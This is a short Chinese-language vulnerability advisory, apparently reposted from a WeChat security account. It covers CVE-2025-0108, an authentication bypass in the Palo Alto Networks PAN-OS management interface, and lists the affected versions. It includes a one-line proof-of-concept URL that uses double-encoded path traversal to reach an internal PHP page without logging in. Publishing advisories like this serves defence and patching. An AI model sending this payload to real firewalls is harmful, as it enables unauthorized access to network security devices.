0x00 前言
派拓网络(Palo Alto Networks)是一家网络安全公司,总部位于美国加利福尼亚州圣克拉拉市。公司的核心产品为“下一代防火墙”(Next-Generation Firewall)平台,提供网络活动的可视化能力,可基于应用(App-ID)、用户(User-ID)与内容(Content-ID)进行网络活动的精细化控制,同时提供基于云的安全服务(GlobalProtect与WildFire)来拓展防火墙的安全性。
0x01 漏洞描述
Palo Alto Networks PAN-OS管理界面存在认证绕过漏洞,未经身份验证的攻击者可通过网络访问管理界面,进而绕过身份验证机制。
0x02 CVE编号
CVE-2025-0108
0x03 影响版本
PAN OS 11.2 < 11.2.4-h4
PAN OS 11.1 < 11.1.6-h1
PAN OS 10.2 < 10.2.13-h3
PAN OS 10.1 < 10.1.14-h9
0x04 漏洞详情
POC:
https://xx.xx.xx.xx/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css
0x05 参考链接
https://security.paloaltonetworks.com/CVE-2025-0108
原文始发于微信公众号(信安百科):CVE-2025-0108|Palo Alto Networks PAN-OS管理界面认证绕过漏洞(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论